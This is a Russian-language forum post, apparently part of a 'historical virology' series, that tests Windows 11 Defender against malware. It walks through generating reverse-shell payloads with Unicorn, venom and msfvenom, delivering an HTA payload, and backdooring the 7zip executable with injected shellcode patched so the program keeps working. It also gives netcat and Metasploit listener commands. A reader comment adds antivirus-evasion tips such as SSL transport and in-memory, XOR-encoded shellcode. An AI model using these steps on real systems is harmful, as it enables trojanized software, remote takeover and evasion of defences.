![]() |
Предисловие Привет, и начнем мы с вопроса, что не свойственно моим работам. Как вы понимаете слово "безопасность"? Существует ли понятие абсолютной защищенности? У каждого может быть свой ответы на эти вопросы, но у меня это вызывает лишь категорическое отрицание. Ведь мы живем в эпоху, поистине удивительную, здесь сочетается как невероятный технический прогресс, так и до абсурдности глупая деградация. И это действительно уникально, ведь в одно время с тем, как кто-то пытается изобрести новый способ защиты, на другом конце провода с петлей на шее висит человек, которому все по барабану. А ведь так было не всегда, убери прогресс - уйдут и проблемы, но кому из современных жителей планеты нравится каменный век? А на вопрос "Было ли раньше лучше?" - отвечать не станем, предоставим это фактам и истории, а именно о истории этот цикл и вещает - Историческая вирусология, предыдущие статьи здесь:https://forum.antichat.xyz/attachmen...db20c0b3e8.png https://forum.antichat.xyz/attachmen...9ce7aafe6e.png 1. Немного ностальгии: историческая вирусология или LoveLetter в цвете современности - 22 года спустя 2. Историческая вирусология: или 40 миллиардов долларов за 18 лет - MyDoom: хронология, история, анализ 3. Историческая вирусология: Чернобыль — как это было на самом деле или как заставить ваш ПК полететь из окна: история, хронология, анализ - CIH 4. Историческая вирусология: разговор о первом черве - или как одна ошибка изменила ход истории - Morris Worm 5. Историческая вирусология: раняя хронология программ-вымогателей - AIDS, GPcode, Arhivarius. Или как шутка психически больного стала каноном 6. Историческая вирусология: поздняя хронология программ-вымогателей - ZeuS, CryptoLocker, CTB: вирусный трафик ценой в миллиарды. Часть 1 7. Историческая вирусология: локер Илона Маска или как открылась Тесла - поздняя хронология программ вымогателей. Часть 2 8. Историческая вирусология: американский школьник и 250 миллионов - Blaster Worm: история, хронология, анализ 9. Историческая вирусология: Политически предубежденный вирус или как очередное исследование зашло не в ту степь - Confiker: история, хронология, анализ 10. Историческая вирусология: безумное китайское творение, натворившее дел - червь Nimda: история, хронология, анализ 11. Историческая вирусология: Червь рекордсмен или как ошибка исследователей привела к тотальному параличу - SQL Slammer: хронология, история, анализ Хотя этот выпуск будет особенный, ведь это кроссовер моих двух новых форматов: Вирусологии и Магической битвы, потому оставлю ссылочки и на неё: 2. Магическая битва: последний Виндоус - противостояние: Windows 11 vs Win 7&10 или как безымянный вирус положил всех на лопатки И все равно я поражаюсь тому, как жизни свойственно меняться, какое-то одно незначительно решение способно завести вас в тупик или, хуже того, вовсе убить. Но не все ваши решения ведут к фатальному исходу, может быть потому эта статья пишется первой в новой квартирке. Но сегодня мы не о этом, в рамках этого кроссоверного выпуска мы будем издеваться над различными антивирусными программами, используя как исторические вредоносы, как и самоделки моих знакомых, новинки тоже стороной не обойдем. На этом этапе вам может показаться это скучным, но читали бы вы это, раз так было бы на самом деле? Вся суть в том, что Майкрософт недавно выпустил новую версию Виндоус, над которой мы уже изрядно так поиздевались. А недавно я и вовсе заметил новость, якобы Билли Гейтс выпускает “универсальное” антивирусное ПО, которое будет работать, как на Виндоус , так и Андроид с IOS, его компания яро заявляет, мол это абсолютная защита. И появилась у меня идейка написать выпуск, в котором мы сравним этот антивирус с аналогами и базовой защитой 11-й версии винды. Да начнется хаос! но сперва: Дисклеймер На самом деле я против зла и то, что я покажу вам далее, может быть, практически применено различного рода антагонистами. Сразу предупреждаю, что я, как автор этой писанины , снимаю с себя ответственность за то с каким умыслом будет использована эта информация дальше. Виноват только и только тот, кто применяет знания, но не тот, кто ими делится. Автор лишь преследует благие цели, используя способы и пути злоумышленников, раскрывает суть преступного механизма, открывая людям глаза, демонстрируя способы защиты, ведь лучший протект — это знания.И напоминаю, что в рамках этой связки статей у нас действует конкурс на 5.555 рублей, а связан он с отсылками в моих работах: культовые фильмы, анимешки да и просто мемы с играми. Узнали? Пишите комментарий, ведь тот, кто раздает все пасхалки - получит денежку. Проделки Майкрософт: развенчание абсолютной безопасности от Билла Гейтса - история тотального провала Итак, прежде чем приступить к самим тестам, давайте разберемся, что же это за антивирус такой. А название было дано ему очень прозаичное - Дефендер, якобы защитник. Вышла эта штуковина 16 июня 2022 года, стало быть три дня назад.Представляет он собой кросс-платформенное приложение, которое предназначено для обычных людей, вроде алкаша Пети из третьего класса. Оно работает как упрощенная панель инструментов, которая подключается к существующему антивирусному программному обеспечению или предлагает дополнительную защиту устройства. Вот здесь уже становится немного интересно, ведь если у него есть метод интеграции в существующий антивирус, не возникнет ли конфликтов с популярными приложениями для защиты? И вообще, зачем эта интеграция, если можно попросту было выпустить полноценную версию ПО? Идем дальше, например, в iOS и iPad iOS нет антивирусной защиты, просто вот по дефолту, и вместо этого приложение предлагает некоторые средства защиты от веб-фишинга вместе с панелью управления, которая включает предупреждения для других устройств. То есть о полноценной защите речь и не идет, даже сам представитель компании сделал заявление, что приложение ещё не готово и оно не способно выполнять свои обязанности на сто процентов. Тогда смысл вообще выпускать вот такой продукт в свет? Я вижу в этом исключительно абсурд и попытку сделать что-либо, дабы отвернуть внимание от явно провалившейся виндоус 11, которую давайте-ка я сейчас установлю быстренько. Хотя стоп, быстро не выйдет, это же одиннадцатая, ха-ха. https://forum.antichat.xyz/attachmen...0d28c6c3c9.png Как же я рад, что научился быстро обходить редактирование реестра, сперва давайте составим список вредоносов, которые мы будем использовать, здесь особо не будет каких-то именитых вирусов, так как с вероятностью в 99% их хеши уже есть в базах. Нам же нужно оценить именно саму работу сканирования процессов, поймет ли стандартный защитник виндоус, что в системе что-то происходит, и как он будет действовать, если таки удосужится заметить. Вот, что составляет основную часть моего интереса. Из прошлых статей цикла Магическая Битва, вы уже могли заметить, что выключить дефендер на 11-ом полностью - практически невыполнимая задача: он предупреждает, он что-то блокирует и не дает запускаться потенциально опасным файлам . Безусловно похвально. Итак, список потенциально опасных программ, которыми будем проводить тесты:
Итак, полезная нагрузка значится. Пришла мне идея и вовсе попытаться воссоздать когда-то актуальный Unicorn-Повершелл пейлоад. На данный момент она уже не работает так как должна, ибо использовала в своей основе лишь старые версии PowerShell, но чем черт не шутит. Давайте протестируем. Идем в Кали и устанавливаем Юникорн: Код: Код:
git clone https://github.com/trustedsec/unicornКод: Код:
./unicorn.py --helpКод: Код:
python unicorn.py windows/meterpreter/reverse_https 192.168.42.1 443Ну и теперь давайте импортируем сие дело в Метасплоит: Код: Код:
msfconsole -r /opt/unicorn/unicorn.rchttps://forum.antichat.xyz/attachmen...ab6ec35f39.png А-а, то есть если запустить не через прямую консоль Повершелл, а через .bat, то у нас откроется сессия метерпретер. Почему это работает… Господи, кстати, на десятке такая фича не пройдёт, она заблокирует, что .bat, что команду в Повершелл. Окей, упустим. Теперь мне захотелось использовать очень старый, но достаточно хитрый метод с использованием того же Метерпретер, но уже с помощью замаскированного HTA. Сперва установим нужный репозиторий из ГитХаб: Код: Код:
git clone https://github.com/r00t-3xp10it/venom.gitКод: Код:
./venom.shИнтересует здесь нас девятый пункт - HTA ShellCode. После вводим свой локальный IP адрес, в моем случае это 192.168.42.129 и рандомный порт, пусть будет 666. В качестве основы полезной нагрузки используем meterpreter/reverse_tcp , ну классика. Вводим рандомное название и начинается самый сок. Выбираем сервер Апачи2 для доставки исполняемого вредоноса на машину жертвы, это у нас наша 11-я. Теперь постэксплуатационный метод, здесь можно выбрать любой, в зависимости от преследуемых целей. Пожалуй просто выберу первый да и все. Кстати, забавно, что даже сейчас процент обнаружения этой штуковины составляет 5 из 56, очень даже достойно. Сразу же осуществляем переход по локальному адресу нашей машины на Кали, но уже в окне браузера испытуемой 11-ой версии. Сам браузер блокирует скачивание файла, но даже если его открыть просто моргнет рабочий стол, ничего не произойдет. Ладненько. Теперь PEшка. Раньше я уже создавал злой PE файл, потому использую ту же методику, в качестве подопытного выберем 7zip, так как он идеально соответствует критериям. О них я рассказывать не стану, так как когда-то посвятил целых две статьи под это, если кто помнит ещё. https://forum.antichat.xyz/attachmen...592d231f8f.png Не станем искать пещеры в коде, а просто создадим новый заголовок, используя PE Lord, пусть он будет называться… Хм-м. vasa? Пусть. Размером он будет у нас в 1000 байт, аналогично и в шестнадцатеричном формате, естественно ставим галочки напротив доступности для записи и чтения. Работу сделали, можно закругляться. Стоп-стоп. Ты чего, автор? Теперь же даже архиватор не работает, ты что сделал. Ой, простите. Так как теперь существует пустой заголовок, сам .exe работать не станет, скорее всего просто выдаст ошибку, мол приложение не может быть запущено. Та-кс, теперь переходим к редактору хеша, сойдёт любой! Нам важно забить конец пустого заголовка нулями, хотя можно чем угодно. Пусть будут нули. Не будем использовать Олли, дабы убедиться, что все корректно сделали, мы уверены в своих действиях! Сейчас нам важно перехватить поток исполнения только что добавленной секции, сначала давайте запишем первые 5 кодов операций, это вот они: Код: Код:
PUSHADТак как делаю не впервые, объясняю туманно, простите, особо здесь подробности и не нужны, я считаю. Чтобы добавить шелл-код, нам нужно поместить регистры в стек, чтобы сохранить их состояние с помощью кодов операций PUSHAD и PUSHFD. В конце шелл-кода мы возвращаем регистры и восстанавливаем поток выполнения, вставляя начальные , которые мы там записали выше, программные инструкции. Теперь мы можем перейти в Кали и сгенерировать Веномом наш Реверс Шелл: Code: Код: Код:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.116.93 LPORT=4444 -a x86 --platform windows -f hexА здесь те самые пять инструкций-кодов, скопированных в начале. Вставляется это каждый раз в новую строку, а конечные коды, который были сначала, востановят поток данных. Теперь у нас есть тот самый шелл в нашем пустом разделе, сохраним для верности, так же само, как делали и в прошлый раз. Ну и теперь можем немного модифицировать сие дело. Если рассмотреть детально, то можем заметить в конце код операции Call EBP, которая просто закрывает программу после того, как шелл выполнил свою функцию. Это нам вообще ни к чему, поэтому кликаем по нему левой мыши и ставим галочку напротив NOP. Следующая манипуляция будет связана с наличием объекта WaitForSingleObject, в нашем шелле. Отвечает она за ожидание перед запуском других потоков, Если мы выполним наш .EXE, он таки даст обратную оболочку, но нормальная работа 7zip остановится, пока мы не закроем наш шелл. Нам просто нужно изменить код операции DEC INC, значение которого -1, на NOP. В принципе, можно сохранять. Поехали, посмотрим как отреагирует одиннадцатая. Но прежде нужно запустить слушатель на Кали: Код: Код:
nc -lvnp 4444И тут я понял, что если продолжу разбирать все и по порядку, то статья выйдет на тысяч 30 символов, потому давайте разберем только два пункта, а во второй части захватим все, что не успели. https://forum.antichat.xyz/attachmen...74a83ddfc2.png Но для разнообразия давайте закинем гвоздь программы - Монооксид, но не будем его запускать так как результат его работы известен. Но вот Дефендеру на него наплевать, просто наплевать, он никак не реагирует. Ладно, скачаем-ка вот этот “универсальный антивирус” от Майкрософт, давайте глянем изменится ли что-то. Мг-г, исключительно для подписчиков 360 Cloud, окей. И вот спустя несколько минут, Дефендер уже установлен. Изменилось ли что-то? Давайте по пунктикам:
Отчет по результативности работы ESET:
Итоги первой части “здрастуйте. вечером запустил после работы как всегда танки "онлайн" и пошел дым чего то из под клавиатуры! и выключился ноут. не подскажите в чем может быть проблема и дорого ли делать ремонт??!!”. Да, друг, потому что ты включил Виндоус и отключил мозги. Именно таким образом я хочу начать подводить итоги этой части, так как здесь виноват даже не сам пользователь-дуболом, а Майкрософт. Да, именно они. Я никогда не был ни их критиком, ни их фанатом. Но начав писать о недостатках, пытался найти плюсы и какой-то позитив в этом всем. Не получилось, буду откровенным. На данный момент последняя версия самой популярной операционной системы в мире выглядит очень сыро. Не только из-за того, что самые банальные методы проникновения работают на ней, хотя это основной камень в их огород, но и интерфейс, эргономика отнюдь не радуют. Выпуск какого-то там дополнения для антивирусов звучит просто смешно на фоне того, как стандартная защита, которая была взята для основы разработки этого кросс-платформенного дефендера, показывает себя в тестах. Даже Аваст, ребята, Аваст, работает лучше. Которого я вовсе считаю одним из самых бесполезных популярных антивирусов. Существует ли абсолютная безопасность? Выбросьте свои устройства в окно, удалите все аккаунты и может быть тогда. А с вами был, как обычно.. Нет, как всегда, какой-то парень под ником DeathDay (и его редактор Яш), который искренне не понимает нынешних действий Майкрософта. Увидимся во второй части, там будет вообще жаришка. Не прощаюсь. Мира всем. 16.06.2022. Defender - история провала. |
Невообразимо крут, +реп, жду вторую часть
|
reverse_TCP палится всеми кроме дефендера рекомендую на SSL переходить, тогда будет норм + прогружайте в память шелкод, оттуда же и стартовать) ну и принимать метасплойтом тоже грамотно нужно, т.к. по дефолту он прогружает вериф. сессии reverse-shell (не пишу уже про meterpreter c ним отдельная история shellcode+XOR+key и т.д.) так вот лучше грамотно настроить прием тогда результат вас удивит еще больше!
|
умничка
|
| Время: 01:59 |